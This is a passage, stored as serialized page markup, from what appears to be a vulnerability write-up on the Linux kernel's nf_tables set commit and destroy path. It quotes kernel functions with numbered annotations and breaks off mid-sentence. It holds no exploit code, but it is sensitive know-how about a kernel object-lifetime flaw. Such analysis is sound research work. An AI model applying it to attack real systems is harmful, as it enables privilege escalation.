list_del_rcu",{"type":24,"tag":301,"props":59241,"children":59242},{"style":359},[59243],{"type":30,"value":362},{"type":24,"tag":301,"props":59245,"children":59246},{"style":385},[59247],{"type":30,"value":556},{"type":24,"tag":301,"props":59249,"children":59250},{"style":314},[59251],{"type":30,"value":59252},"nft_trans_set",{"type":24,"tag":301,"props":59254,"children":59255},{"style":359},[59256],{"type":30,"value":59209},{"type":24,"tag":301,"props":59258,"children":59259},{"style":369},[59260],{"type":30,"value":59261},"list",{"type":24,"tag":301,"props":59263,"children":59264},{"style":359},[59265],{"type":30,"value":589},{"type":24,"tag":301,"props":59267,"children":59268},{"class":303,"line":447},[59269,59274,59278,59282,59287,59291,59295,59299,59303],{"type":24,"tag":301,"props":59270,"children":59271},{"style":314},[59272],{"type":30,"value":59273}," nf_tables_set_notify",{"type":24,"tag":301,"props":59275,"children":59276},{"style":359},[59277],{"type":30,"value":362},{"type":24,"tag":301,"props":59279,"children":59280},{"style":385},[59281],{"type":30,"value":556},{"type":24,"tag":301,"props":59283,"children":59284},{"style":369},[59285],{"type":30,"value":59286},"trans",{"type":24,"tag":301,"props":59288,"children":59289},{"style":359},[59290],{"type":30,"value":882},{"type":24,"tag":301,"props":59292,"children":59293},{"style":369},[59294],{"type":30,"value":27051},{"type":24,"tag":301,"props":59296,"children":59297},{"style":359},[59298],{"type":30,"value":377},{"type":24,"tag":301,"props":59300,"children":59301},{"style":314},[59302],{"type":30,"value":59252},{"type":24,"tag":301,"props":59304,"children":59305},{"style":359},[59306],{"type":30,"value":59307},"(trans),\n",{"type":24,"tag":301,"props":59309,"children":59310},{"class":303,"line":476},[59311,59316,59320,59325],{"type":24,"tag":301,"props":59312,"children":59313},{"style":369},[59314],{"type":30,"value":59315}," trans",{"type":24,"tag":301,"props":59317,"children":59318},{"style":359},[59319],{"type":30,"value":882},{"type":24,"tag":301,"props":59321,"children":59322},{"style":369},[59323],{"type":30,"value":59324},"msg_type",{"type":24,"tag":301,"props":59326,"children":59327},{"style":359},[59328],{"type":30,"value":59329},", GFP_KERNEL);\n",{"type":24,"tag":301,"props":59331,"children":59332},{"class":303,"line":495},[59333,59338],{"type":24,"tag":301,"props":59334,"children":59335},{"style":308},[59336],{"type":30,"value":59337}," break",{"type":24,"tag":301,"props":59339,"children":59340},{"style":359},[59341],{"type":30,"value":492},{"type":24,"tag":301,"props":59343,"children":59344},{"class":303,"line":504},[59345,59350],{"type":24,"tag":301,"props":59346,"children":59347},{"style":359},[59348],{"type":30,"value":59349}," case NFT_MSG_NEWSETELEM:",{"type":24,"tag":301,"props":59351,"children":59352},{"style":1062},[59353],{"type":30,"value":59354}," // [3]\n",{"type":24,"tag":301,"props":59356,"children":59357},{"class":303,"line":512},[59358],{"type":24,"tag":301,"props":59359,"children":59360},{"style":359},[59361],{"type":30,"value":17123},{"type":24,"tag":301,"props":59363,"children":59364},{"class":303,"line":592},[59365,59369,59373,59378,59382,59386,59390,59395,59399,59404],{"type":24,"tag":301,"props":59366,"children":59367},{"style":308},[59368],{"type":30,"value":868},{"type":24,"tag":301,"props":59370,"children":59371},{"style":359},[59372],{"type":30,"value":873},{"type":24,"tag":301,"props":59374,"children":59375},{"style":369},[59376],{"type":30,"value":59377},"te",{"type":24,"tag":301,"props":59379,"children":59380},{"style":359},[59381],{"type":30,"value":882},{"type":24,"tag":301,"props":59383,"children":59384},{"style":369},[59385],{"type":30,"value":57749},{"type":24,"tag":301,"props":59387,"children":59388},{"style":359},[59389],{"type":30,"value":882},{"type":24,"tag":301,"props":59391,"children":59392},{"style":369},[59393],{"type":30,"value":59394},"ops",{"type":24,"tag":301,"props":59396,"children":59397},{"style":359},[59398],{"type":30,"value":882},{"type":24,"tag":301,"props":59400,"children":59401},{"style":369},[59402],{"type":30,"value":59403},"commit",{"type":24,"tag":301,"props":59405,"children":59406},{"style":385},[59407],{"type":30,"value":59408}," &&\n",{"type":24,"tag":301,"props":59410,"children":59411},{"class":303,"line":619},[59412,59417,59421,59425,59429,59433,59437,59441,59446],{"type":24,"tag":301,"props":59413,"children":59414},{"style":314},[59415],{"type":30,"value":59416}," list_empty",{"type":24,"tag":301,"props":59418,"children":59419},{"style":359},[59420],{"type":30,"value":362},{"type":24,"tag":301,"props":59422,"children":59423},{"style":385},[59424],{"type":30,"value":556},{"type":24,"tag":301,"props":59426,"children":59427},{"style":369},[59428],{"type":30,"value":59377},{"type":24,"tag":301,"props":59430,"children":59431},{"style":359},[59432],{"type":30,"value":882},{"type":24,"tag":301,"props":59434,"children":59435},{"style":369},[59436],{"type":30,"value":57749},{"type":24,"tag":301,"props":59438,"children":59439},{"style":359},[59440],{"type":30,"value":882},{"type":24,"tag":301,"props":59442,"children":59443},{"style":369},[59444],{"type":30,"value":59445},"pending_update",{"type":24,"tag":301,"props":59447,"children":59448},{"style":359},[59449],{"type":30,"value":41941},{"type":24,"tag":301,"props":59451,"children":59452},{"class":303,"line":635},[59453,59458,59462,59466,59470,59474,59478,59482,59486],{"type":24,"tag":301,"props":59454,"children":59455},{"style":314},[59456],{"type":30,"value":59457}," list_add_tail",{"type":24,"tag":301,"props":59459,"children":59460},{"style":359},[59461],{"type":30,"value":362},{"type":24,"tag":301,"props":59463,"children":59464},{"style":385},[59465],{"type":30,"value":556},{"type":24,"tag":301,"props":59467,"children":59468},{"style":369},[59469],{"type":30,"value":59377},{"type":24,"tag":301,"props":59471,"children":59472},{"style":359},[59473],{"type":30,"value":882},{"type":24,"tag":301,"props":59475,"children":59476},{"style":369},[59477],{"type":30,"value":57749},{"type":24,"tag":301,"props":59479,"children":59480},{"style":359},[59481],{"type":30,"value":882},{"type":24,"tag":301,"props":59483,"children":59484},{"style":369},[59485],{"type":30,"value":59445},{"type":24,"tag":301,"props":59487,"children":59488},{"style":359},[59489],{"type":30,"value":1729},{"type":24,"tag":301,"props":59491,"children":59492},{"class":303,"line":643},[59493,59498],{"type":24,"tag":301,"props":59494,"children":59495},{"style":385},[59496],{"type":30,"value":59497}," &",{"type":24,"tag":301,"props":59499,"children":59500},{"style":359},[59501],{"type":30,"value":59502},"set_update_list);\n",{"type":24,"tag":301,"props":59504,"children":59505},{"class":303,"line":652},[59506],{"type":24,"tag":301,"props":59507,"children":59508},{"style":359},[59509],{"type":30,"value":1638},{"type":24,"tag":301,"props":59511,"children":59512},{"class":303,"line":666},[59513],{"type":24,"tag":301,"props":59514,"children":59515},{"style":359},[59516],{"type":30,"value":17123},{"type":24,"tag":301,"props":59518,"children":59519},{"class":303,"line":674},[59520],{"type":24,"tag":301,"props":59521,"children":59522},{"style":359},[59523],{"type":30,"value":16401},{"type":24,"tag":301,"props":59525,"children":59526},{"class":303,"line":692},[59527],{"type":24,"tag":301,"props":59528,"children":59529},{"emptyLinePlaceholder":16},[59530],{"type":30,"value":341},{"type":24,"tag":301,"props":59532,"children":59533},{"class":303,"line":3631},[59534,59539,59543,59547,59552],{"type":24,"tag":301,"props":59535,"children":59536},{"style":314},[59537],{"type":30,"value":59538}," nft_set_commit_update",{"type":24,"tag":301,"props":59540,"children":59541},{"style":359},[59542],{"type":30,"value":362},{"type":24,"tag":301,"props":59544,"children":59545},{"style":385},[59546],{"type":30,"value":556},{"type":24,"tag":301,"props":59548,"children":59549},{"style":369},[59550],{"type":30,"value":59551},"set_update_list",{"type":24,"tag":301,"props":59553,"children":59554},{"style":359},[59555],{"type":30,"value":589},{"type":24,"tag":301,"props":59557,"children":59558},{"class":303,"line":3639},[59559],{"type":24,"tag":301,"props":59560,"children":59561},{"style":359},[59562],{"type":30,"value":17123},{"type":24,"tag":301,"props":59564,"children":59565},{"class":303,"line":3647},[59566,59571],{"type":24,"tag":301,"props":59567,"children":59568},{"style":314},[59569],{"type":30,"value":59570}," nf_tables_commit_release",{"type":24,"tag":301,"props":59572,"children":59573},{"style":359},[59574],{"type":30,"value":59575},"(net);\n",{"type":24,"tag":301,"props":59577,"children":59578},{"class":303,"line":3685},[59579],{"type":24,"tag":301,"props":59580,"children":59581},{"emptyLinePlaceholder":16},[59582],{"type":30,"value":341},{"type":24,"tag":301,"props":59584,"children":59585},{"class":303,"line":3713},[59586,59591,59595],{"type":24,"tag":301,"props":59587,"children":59588},{"style":308},[59589],{"type":30,"value":59590}," return",{"type":24,"tag":301,"props":59592,"children":59593},{"style":466},[59594],{"type":30,"value":685},{"type":24,"tag":301,"props":59596,"children":59597},{"style":359},[59598],{"type":30,"value":492},{"type":24,"tag":301,"props":59600,"children":59601},{"class":303,"line":3721},[59602],{"type":24,"tag":301,"props":59603,"children":59604},{"style":359},[59605],{"type":30,"value":698},{"type":24,"tag":32,"props":59607,"children":59608},{},[59609,59610,59616,59618,59623],{"type":30,"value":8079},{"type":24,"tag":145,"props":59611,"children":59613},{"className":59612},[],[59614],{"type":30,"value":59615},"nft_set_commit_update()",{"type":30,"value":59617}," function in the code above will call the ",{"type":24,"tag":145,"props":59619,"children":59621},{"className":59620},[],[59622],{"type":30,"value":59070},{"type":30,"value":59624}," method for any objects that were marked as pending an update.",{"type":24,"tag":291,"props":59626,"children":59628},{"className":295,"code":59627,"language":294,"meta":7,"style":7},"static void nft_set_commit_update(struct list_head *set_update_list)\n{\n struct nft_set *set, *next;\n\n list_for_each_entry_safe(set, next, set_update_list, pending_update) {\n list_del_init(&set->pending_update);\n\n if (!set->ops->commit || set->dead) // [4]\n continue;\n\n set->ops->commit(set); // [5]\n }\n}\n",[59629],{"type":24,"tag":145,"props":59630,"children":59631},{"__ignoreMap":7},[59632,59672,59679,59708,59715,59728,59760,59767,59828,59839,59846,59880,59887],{"type":24,"tag":301,"props":59633,"children":59634},{"class":303,"line":304},[59635,59639,59643,59647,59651,59655,59660,59664,59668],{"type":24,"tag":301,"props":59636,"children":59637},{"style":348},[59638],{"type":30,"value":752},{"type":24,"tag":301,"props":59640,"children":59641},{"style":348},[59642],{"type":30,"value":757},{"type":24,"tag":301,"props":59644,"children":59645},{"style":314},[59646],{"type":30,"value":59538},{"type":24,"tag":301,"props":59648,"children":59649},{"style":359},[59650],{"type":30,"value":362},{"type":24,"tag":301,"props":59652,"children":59653},{"style":348},[59654],{"type":30,"value":3010},{"type":24,"tag":301,"props":59656,"children":59657},{"style":359},[59658],{"type":30,"value":59659}," list_head ",{"type":24,"tag":301,"props":59661,"children":59662},{"style":385},[59663],{"type":30,"value":772},{"type":24,"tag":301,"props":59665,"children":59666},{"style":369},[59667],{"type":30,"value":59551},{"type":24,"tag":301,"props":59669,"children":59670},{"style":359},[59671],{"type":30,"value":791},{"type":24,"tag":301,"props":59673,"children":59674},{"class":303,"line":320},[59675],{"type":24,"tag":301,"props":59676,"children":59677},{"style":359},[59678],{"type":30,"value":799},{"type":24,"tag":301,"props":59680,"children":59681},{"class":303,"line":335},[59682,59686,59690,59694,59699,59703],{"type":24,"tag":301,"props":59683,"children":59684},{"style":348},[59685],{"type":30,"value":27920},{"type":24,"tag":301,"props":59687,"children":59688},{"style":359},[59689],{"type":30,"value":57827},{"type":24,"tag":301,"props":59691,"children":59692},{"style":385},[59693],{"type":30,"value":772},{"type":24,"tag":301,"props":59695,"children":59696},{"style":359},[59697],{"type":30,"value":59698},"set, ",{"type":24,"tag":301,"props":59700,"children":59701},{"style":385},[59702],{"type":30,"value":772},{"type":24,"tag":301,"props":59704,"children":59705},{"style":359},[59706],{"type":30,"value":59707},"next;\n",{"type":24,"tag":301,"props":59709,"children":59710},{"class":303,"line":344},[59711],{"type":24,"tag":301,"props":59712,"children":59713},{"emptyLinePlaceholder":16},[59714],{"type":30,"value":341},{"type":24,"tag":301,"props":59716,"children":59717},{"class":303,"line":401},[59718,59723],{"type":24,"tag":301,"props":59719,"children":59720},{"style":314},[59721],{"type":30,"value":59722}," list_for_each_entry_safe",{"type":24,"tag":301,"props":59724,"children":59725},{"style":359},[59726],{"type":30,"value":59727},"(set, next, set_update_list, pending_update) {\n",{"type":24,"tag":301,"props":59729,"children":59730},{"class":303,"line":415},[59731,59736,59740,59744,59748,59752,59756],{"type":24,"tag":301,"props":59732,"children":59733},{"style":314},[59734],{"type":30,"value":59735}," list_del_init",{"type":24,"tag":301,"props":59737,"children":59738},{"style":359},[59739],{"type":30,"value":362},{"type":24,"tag":301,"props":59741,"children":59742},{"style":385},[59743],{"type":30,"value":556},{"type":24,"tag":301,"props":59745,"children":59746},{"style":369},[59747],{"type":30,"value":57749},{"type":24,"tag":301,"props":59749,"children":59750},{"style":359},[59751],{"type":30,"value":882},{"type":24,"tag":301,"props":59753,"children":59754},{"style":369},[59755],{"type":30,"value":59445},{"type":24,"tag":301,"props":59757,"children":59758},{"style":359},[59759],{"type":30,"value":589},{"type":24,"tag":301,"props":59761,"children":59762},{"class":303,"line":439},[59763],{"type":24,"tag":301,"props":59764,"children":59765},{"emptyLinePlaceholder":16},[59766],{"type":30,"value":341},{"type":24,"tag":301,"props":59768,"children":59769},{"class":303,"line":447},[59770,59774,59778,59782,59786,59790,59794,59798,59802,59806,59811,59815,59819,59823],{"type":24,"tag":301,"props":59771,"children":59772},{"style":308},[59773],{"type":30,"value":38149},{"type":24,"tag":301,"props":59775,"children":59776},{"style":359},[59777],{"type":30,"value":873},{"type":24,"tag":301,"props":59779,"children":59780},{"style":385},[59781],{"type":30,"value":2485},{"type":24,"tag":301,"props":59783,"children":59784},{"style":369},[59785],{"type":30,"value":57749},{"type":24,"tag":301,"props":59787,"children":59788},{"style":359},[59789],{"type":30,"value":882},{"type":24,"tag":301,"props":59791,"children":59792},{"style":369},[59793],{"type":30,"value":59394},{"type":24,"tag":301,"props":59795,"children":59796},{"style":359},[59797],{"type":30,"value":882},{"type":24,"tag":301,"props":59799,"children":59800},{"style":369},[59801],{"type":30,"value":59403},{"type":24,"tag":301,"props":59803,"children":59804},{"style":385},[59805],{"type":30,"value":3308},{"type":24,"tag":301,"props":59807,"children":59808},{"style":369},[59809],{"type":30,"value":59810}," set",{"type":24,"tag":301,"props":59812,"children":59813},{"style":359},[59814],{"type":30,"value":882},{"type":24,"tag":301,"props":59816,"children":59817},{"style":369},[59818],{"type":30,"value":59214},{"type":24,"tag":301,"props":59820,"children":59821},{"style":359},[59822],{"type":30,"value":9961},{"type":24,"tag":301,"props":59824,"children":59825},{"style":1062},[59826],{"type":30,"value":59827}," // [4]\n",{"type":24,"tag":301,"props":59829,"children":59830},{"class":303,"line":476},[59831,59835],{"type":24,"tag":301,"props":59832,"children":59833},{"style":308},[59834],{"type":30,"value":58216},{"type":24,"tag":301,"props":59836,"children":59837},{"style":359},[59838],{"type":30,"value":492},{"type":24,"tag":301,"props":59840,"children":59841},{"class":303,"line":495},[59842],{"type":24,"tag":301,"props":59843,"children":59844},{"emptyLinePlaceholder":16},[59845],{"type":30,"value":341},{"type":24,"tag":301,"props":59847,"children":59848},{"class":303,"line":504},[59849,59854,59858,59862,59866,59870,59875],{"type":24,"tag":301,"props":59850,"children":59851},{"style":369},[59852],{"type":30,"value":59853}," set",{"type":24,"tag":301,"props":59855,"children":59856},{"style":359},[59857],{"type":30,"value":882},{"type":24,"tag":301,"props":59859,"children":59860},{"style":369},[59861],{"type":30,"value":59394},{"type":24,"tag":301,"props":59863,"children":59864},{"style":359},[59865],{"type":30,"value":882},{"type":24,"tag":301,"props":59867,"children":59868},{"style":314},[59869],{"type":30,"value":59403},{"type":24,"tag":301,"props":59871,"children":59872},{"style":359},[59873],{"type":30,"value":59874},"(set);",{"type":24,"tag":301,"props":59876,"children":59877},{"style":1062},[59878],{"type":30,"value":59879}," // [5]\n",{"type":24,"tag":301,"props":59881,"children":59882},{"class":303,"line":512},[59883],{"type":24,"tag":301,"props":59884,"children":59885},{"style":359},[59886],{"type":30,"value":16401},{"type":24,"tag":301,"props":59888,"children":59889},{"class":303,"line":592},[59890],{"type":24,"tag":301,"props":59891,"children":59892},{"style":359},[59893],{"type":30,"value":698},{"type":24,"tag":32,"props":59895,"children":59896},{},[59897,59899,59905,59907,59912,59913,59918],{"type":30,"value":59898},"Later on, the ",{"type":24,"tag":145,"props":59900,"children":59902},{"className":59901},[],[59903],{"type":30,"value":59904},"nf_tables_commit_release()",{"type":30,"value":59906}," function is called to free any objects that were marked for release, and eventually calls the ",{"type":24,"tag":145,"props":59908,"children":59910},{"className":59909},[],[59911],{"type":30,"value":57749},{"type":30,"value":59064},{"type":24,"tag":145,"props":59914,"children":59916},{"className":59915},[],[59917],{"type":30,"value":59078},{"type":30,"value":59919}," method.",{"type":24,"tag":291,"props":59921,"children":59923},{"className":295,"code":59922,"language":294,"meta":7,"style":7},"static void nf_tables_commit_release(struct net *net)\n{\n[...]\n schedule_work(&trans_destroy_work);\n[...]\n}\n[...]\nstatic void nf_tables_trans_destroy_work(struct work_struct *w)\n{\n[...]\n list_for_each_entry_safe(trans, next, &head, list) {\n nft_trans_list_del(trans);\n nft_commit_release(trans);\n }\n}\n[...]\nstatic void nft_commit_release(struct nft_trans *trans)\n{\n switch (trans->msg_type) {\n[...]\n case NFT_MSG_DELSET:\n case NFT_MSG_DESTROYSET:\n nft_set_destroy(&trans->ctx, nft_trans_set(trans));\n[...]\n}\n[...]\nstatic void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)\n{\n[...]\n set->ops->destroy(ctx, set);\n[...]\n}\n",[59924],{"type":24,"tag":145,"props":59925,"children":59926},{"__ignoreMap":7},[59927,59966,59973,59980,60001,60008,60015,60022,60063,60070,60077,60098,60111,60123,60130,60137,60144,60185,60192,60220,60227,60240,60252,60293,60300,60307,60314,60372,60379,60386,60415,60422],{"type":24,"tag":301,"props":59928,"children":59929},{"class":303,"line":304},[59930,59934,59938,59942,59946,59950,59954,59958,59962],{"type":24,"tag":301,"props":59931,"children":59932},{"style":348},[59933],{"type":30,"value":752},{"type":24,"tag":301,"props":59935,"children":59936},{"style":348},[59937],{"type":30,"value":757},{"type":24,"tag":301,"props":59939,"children":59940},{"style":314},[59941],{"type":30,"value":59570},{"type":24,"tag":301,"props":59943,"children":59944},{"style":359},[59945],{"type":30,"value":362},{"type":24,"tag":301,"props":59947,"children":59948},{"style":348},[59949],{"type":30,"value":3010},{"type":24,"tag":301,"props":59951,"children":59952},{"style":359},[59953],{"type":30,"value":58727},{"type":24,"tag":301,"props":59955,"children":59956},{"style":385},[59957],{"type":30,"value":772},{"type":24,"tag":301,"props":59959,"children":59960},{"style":369},[59961],{"type":30,"value":58736},{"type":24,"tag":301,"props":59963,"children":59964},{"style":359},[59965],{"type":30,"value":791},{"type":24,"tag":301,"props":59967,"children":59968},{"class":303,"line":320},[59969],{"type":24,"tag":301,"props":59970,"children":59971},{"style":359},[59972],{"type":30,"value":799},{"type":24,"tag":301,"props":59974,"children":59975},{"class":303,"line":335},[59976],{"type":24,"tag":301,"props":59977,"children":59978},{"style":359},[59979],{"type":30,"value":17123},{"type":24,"tag":301,"props":59981,"children":59982},{"class":303,"line":344},[59983,59988,59992,59996],{"type":24,"tag":301,"props":59984,"children":59985},{"style":314},[59986],{"type":30,"value":59987}," schedule_work",{"type":24,"tag":301,"props":59989,"children":59990},{"style":359},[59991],{"type":30,"value":362},{"type":24,"tag":301,"props":59993,"children":59994},{"style":385},[59995],{"type":30,"value":556},{"type":24,"tag":301,"props":59997,"children":59998},{"style":359},[59999],{"type":30,"value":60000},"trans_destroy_work);\n",{"type":24,"tag":301,"props":60002,"children":60003},{"class":303,"line":401},[60004],{"type":24,"tag":301,"props":60005,"children":60006},{"style":359},[60007],{"type":30,"value":17123},{"type":24,"tag":301,"props":60009,"children":60010},{"class":303,"line":415},[60011],{"type":24,"tag":301,"props":60012,"children":60013},{"style":359},[60014],{"type":30,"value":698},{"type":24,"tag":301,"props":60016,"children":60017},{"class":303,"line":439},[60018],{"type":24,"tag":301,"props":60019,"children":60020},{"style":359},[60021],{"type":30,"value":17123},{"type":24,"tag":301,"props":60023,"children":60024},{"class":303,"line":447},[60025,60029,60033,60038,60042,60046,60051,60055,60059],{"type":24,"tag":301,"props":60026,"children":60027},{"style":348},[60028],{"type":30,"value":752},{"type":24,"tag":301,"props":60030,"children":60031},{"style":348},[60032],{"type":30,"value":757},{"type":24,"tag":301,"props":60034,"children":60035},{"style":314},[60036],{"type":30,"value":60037}," nf_tables_trans_destroy_work",{"type":24,"tag":301,"props":60039,"children":60040},{"style":359},[60041],{"type":30,"value":362},{"type":24,"tag":301,"props":60043,"children":60044},{"style":348},[60045],{"type":30,"value":3010},{"type":24,"tag":301,"props":60047,"children":60048},{"style":359},[60049],{"type":30,"value":60050}," work_struct ",{"type":24,"tag":301,"props":60052,"children":60053},{"style":385},[60054],{"type":30,"value":772},{"type":24,"tag":301,"props":60056,"children":60057},{"style":369},[60058],{"type":30,"value":2580},{"type":24,"tag":301,"props":60060,"children":60061},{"style":359},[60062],{"type":30,"value":791},{"type":24,"tag":301,"props":60064,"children":60065},{"class":303,"line":476},[60066],{"type":24,"tag":301,"props":60067,"children":60068},{"style":359},[60069],{"type":30,"value":799},{"type":24,"tag":301,"props":60071,"children":60072},{"class":303,"line":495},[60073],{"type":24,"tag":301,"props":60074,"children":60075},{"style":359},[60076],{"type":30,"value":17123},{"type":24,"tag":301,"props":60078,"children":60079},{"class":303,"line":504},[60080,60084,60089,60093],{"type":24,"tag":301,"props":60081,"children":60082},{"style":314},[60083],{"type":30,"value":59722},{"type":24,"tag":301,"props":60085,"children":60086},{"style":359},[60087],{"type":30,"value":60088},"(trans, next, ",{"type":24,"tag":301,"props":60090,"children":60091},{"style":385},[60092],{"type":30,"value":556},{"type":24,"tag":301,"props":60094,"children":60095},{"style":359},[60096],{"type":30,"value":60097},"head, list) {\n",{"type":24,"tag":301,"props":60099,"children":60100},{"class":303,"line":512},[60101,60106],{"type":24,"tag":301,"props":60102,"children":60103},{"style":314},[60104],{"type":30,"value":60105}," nft_trans_list_del",{"type":24,"tag":301,"props":60107,"children":60108},{"style":359},[60109],{"type":30,"value":60110},"(trans);\n",{"type":24,"tag":301,"props":60112,"children":60113},{"class":303,"line":592},[60114,60119],{"type":24,"tag":301,"props":60115,"children":60116},{"style":314},[60117],{"type":30,"value":60118}," nft_commit_release",{"type":24,"tag":301,"props":60120,"children":60121},{"style":359},[60122],{"type":30,"value":60110},{"type":24,"tag":301,"props":60124,"children":60125},{"class":303,"line":619},[60126],{"type":24,"tag":301,"props":60127,"children":60128},{"style":359},[60129],{"type":30,"value":16401},{"type":24,"tag":301,"props":60131,"children":60132},{"class":303,"line":635},[60133],{"type":24,"tag":301,"props":60134,"children":60135},{"style":359},[60136],{"type":30,"value":698},{"type":24,"tag":301,"props":60138,"children":60139},{"class":303,"line":643},[60140],{"type":24,"tag":301,"props":60141,"children":60142},{"style":359},[60143],{"type":30,"value":17123},{"type":24,"tag":301,"props":60145,"children":60146},{"class":303,"line":652},[60147,60151,60155,60160,60164,60168,60173,60177,60181],{"type":24,"tag":301,"props":60148,"children":60149},{"style":348},[60150],{"type":30,"value":752},{"type":24,"tag":301,"props":60152,"children":60153},{"style":348},[60154],{"type":30,"value":757},{"type":24,"tag":301,"props":60156,"children":60157},{"style":314},[60158],{"type":30,"value":60159}," nft_commit_release",{"type":24,"tag":301,"props":60161,"children":60162},{"style":359},[60163],{"type":30,"value":362},{"type":24,"tag":301,"props":60165,"children":60166},{"style":348},[60167],{"type":30,"value":3010},{"type":24,"tag":301,"props":60169,"children":60170},{"style":359},[60171],{"type":30,"value":60172}," nft_trans ",{"type":24,"tag":301,"props":60174,"children":60175},{"style":385},[60176],{"type":30,"value":772},{"type":24,"tag":301,"props":60178,"children":60179},{"style":369},[60180],{"type":30,"value":59286},{"type":24,"tag":301,"props":60182,"children":60183},{"style":359},[60184],{"type":30,"value":791},{"type":24,"tag":301,"props":60186,"children":60187},{"class":303,"line":666},[60188],{"type":24,"tag":301,"props":60189,"children":60190},{"style":359},[60191],{"type":30,"value":799},{"type":24,"tag":301,"props":60193,"children":60194},{"class":303,"line":674},[60195,60200,60204,60208,60212,60216],{"type":24,"tag":301,"props":60196,"children":60197},{"style":308},[60198],{"type":30,"value":60199}," switch",{"type":24,"tag":301,"props":60201,"children":60202},{"style":359},[60203],{"type":30,"value":873},{"type":24,"tag":301,"props":60205,"children":60206},{"style":369},[60207],{"type":30,"value":59286},{"type":24,"tag":301,"props":60209,"children":60210},{"style":359},[60211],{"type":30,"value":882},{"type":24,"tag":301,"props":60213,"children":60214},{"style":369},[60215],{"type":30,"value":59324},{"type":24,"tag":301,"props":60217,"children":60218},{"style":359},[60219],{"type":30,"value":398},{"type":24,"tag":301,"props":60221,"children":60222},{"class":303,"line":692},[60223],{"type":24,"tag":301,"props":60224,"children":60225},{"style":359},[60226],{"type":30,"value":17123},{"type":24,"tag":301,"props":60228,"children":60229},{"class":303,"line":3631},[60230,60235],{"type":24,"tag":301,"props":60231,"children":60232},{"style":308},[60233],{"type":30,"value":60234}," case",{"type":24,"tag":301,"props":60236,"children":60237},{"style":359},[60238],{"type":30,"value":60239}," NFT_MSG_DELSET:\n",{"type":24,"tag":301,"props":60241,"children":60242},{"class":303,"line":3639},[60243,60247],{"type":24,"tag":301,"props":60244,"children":60245},{"style":308},[60246],{"type":30,"value":60234},{"type":24,"tag":301,"props":60248,"children":60249},{"style":359},[60250],{"type":30,"value":60251}," NFT_MSG_DESTROYSET:\n",{"type":24,"tag":301,"props":60253,"children":60254},{"class":303,"line":3647},[60255,60260,60264,60268,60272,60276,60280,60284,60288],{"type":24,"tag":301,"props":60256,"children":60257},{"style":314},[60258],{"type":30,"value":60259}," nft_set_destroy",{"type":24,"tag":301,"props":60261,"children":60262},{"style":359},[60263],{"type":30,"value":362},{"type":24,"tag":301,"props":60265,"children":60266},{"style":385},[60267],{"type":30,"value":556},{"type":24,"tag":301,"props":60269,"children":60270},{"style":359},[60271],{"type":30,"value":59286},{"type":24,"tag":301,"props":60273,"children":60274},{"style":385},[60275],{"type":30,"value":882},{"type":24,"tag":301,"props":60277,"children":60278},{"style":369},[60279],{"type":30,"value":27051},{"type":24,"tag":301,"props":60281,"children":60282},{"style":359},[60283],{"type":30,"value":377},{"type":24,"tag":301,"props":60285,"children":60286},{"style":314},[60287],{"type":30,"value":59252},{"type":24,"tag":301,"props":60289,"children":60290},{"style":359},[60291],{"type":30,"value":60292},"(trans));\n",{"type":24,"tag":301,"props":60294,"children":60295},{"class":303,"line":3685},[60296],{"type":24,"tag":301,"props":60297,"children":60298},{"style":359},[60299],{"type":30,"value":17123},{"type":24,"tag":301,"props":60301,"children":60302},{"class":303,"line":3713},[60303],{"type":24,"tag":301,"props":60304,"children":60305},{"style":359},[60306],{"type":30,"value":698},{"type":24,"tag":301,"props":60308,"children":60309},{"class":303,"line":3721},[60310],{"type":24,"tag":301,"props":60311,"children":60312},{"style":359},[60313],{"type":30,"value":17123},{"type":24,"tag":301,"props":60315,"children":60316},{"class":303,"line":3751},[60317,60321,60325,60330,60334,60338,60342,60346,60350,60355,60359,60363,60367],{"type":24,"tag":301,"props":60318,"children":60319},{"style":348},[60320],{"type":30,"value":752},{"type":24,"tag":301,"props":60322,"children":60323},{"style":348},[60324],{"type":30,"value":757},{"type":24,"tag":301,"props":60326,"children":60327},{"style":314},[60328],{"type":30,"value":60329}," nft_set_destroy",{"type":24,"tag":301,"props":60331,"children":60332},{"style":359},[60333],{"type":30,"value":362},{"type":24,"tag":301,"props":60335,"children":60336},{"style":348},[60337],{"type":30,"value":16460},{"type":24,"tag":301,"props":60339,"children":60340},{"style":348},[60341],{"type":30,"value":27920},{"type":24,"tag":301,"props":60343,"children":60344},{"style":359},[60345],{"type":30,"value":57799},{"type":24,"tag":301,"props":60347,"children":60348},{"style":385},[60349],{"type":30,"value":772},{"type":24,"tag":301,"props":60351,"children":60352},{"style":359},[60353],{"type":30,"value":60354},"ctx, ",{"type":24,"tag":301,"props":60356,"children":60357},{"style":348},[60358],{"type":30,"value":3010},{"type":24,"tag":301,"props":60360,"children":60361},{"style":359},[60362],{"type":30,"value":57827},{"type":24,"tag":301,"props":60364,"children":60365},{"style":385},[60366],{"type":30,"value":772},{"type":24,"tag":301,"props":60368,"children":60369},{"style":359},[60370],{"type":30,"value":60371},"set)\n",{"type":24,"tag":301,"props":60373,"children":60374},{"class":303,"line":3782},[60375],{"type":24,"tag":301,"props":60376,"children":60377},{"style":359},[60378],{"type":30,"value":799},{"type":24,"tag":301,"props":60380,"children":60381},{"class":303,"line":3791},[60382],{"type":24,"tag":301,"props":60383,"children":60384},{"style":359},[60385],{"type":30,"value":17123},{"type":24,"tag":301,"props":60387,"children":60388},{"class":303,"line":3819},[60389,60393,60397,60401,60405,60410],{"type":24,"tag":301,"props":60390,"children":60391},{"style":369},[60392],{"type":30,"value":59810},{"type":24,"tag":301,"props":60394,"children":60395},{"style":359},[60396],{"type":30,"value":882},{"type":24,"tag":301,"props":60398,"children":60399},{"style":369},[60400],{"type":30,"value":59394},{"type":24,"tag":301,"props":60402,"children":60403},{"style":359},[60404],{"type":30,"value":882},{"type":24,"tag":301,"props":60406,"children":60407},{"style":314},[60408],{"type":30,"value":60409},"destroy",{"type":24,"tag":301,"props":60411,"children":60412},{"style":359},[60413],{"type":30,"value":60414},"(ctx, set);\n",{"type":24,"tag":301,"props":60416,"children":60417},{"class":303,"line":4397},[60418],{"type":24,"tag":301,"props":60419,"children":60420},{"style":359},[60421],{"type":30,"value":17123},{"type":24,"tag":301,"props":60423,"children":60424},{"class":303,"line":4405},[60425],{"type":24,"tag":301,"props":60426,"children":60427},{"style":359},[60428],{"type":30,"value":698},{"type":24,"tag":32,"props":60430,"children":60431},{},[60432,60434,60439,60441,60446,60448,60454,60456,60461,60463,60468,60470,60474,60476,60481,60482,60486,60488,60494],{"type":30,"value":60433},"It may appear as if it would be impossible to make 